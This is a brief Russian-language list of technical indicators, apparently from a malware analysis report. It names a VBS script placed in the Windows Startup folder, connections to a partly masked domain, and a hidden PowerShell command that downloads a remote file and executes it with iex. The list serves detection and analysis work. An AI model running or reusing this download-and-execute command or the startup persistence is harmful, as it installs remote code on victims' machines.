Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'up##0.com':443
- DNS ASK up##0.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://www.up##0.com/i/00198/9jmcwa9r4d54.jpg')' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://www.up##0.com/i/00198/9jmcwa9r4d54.jpg')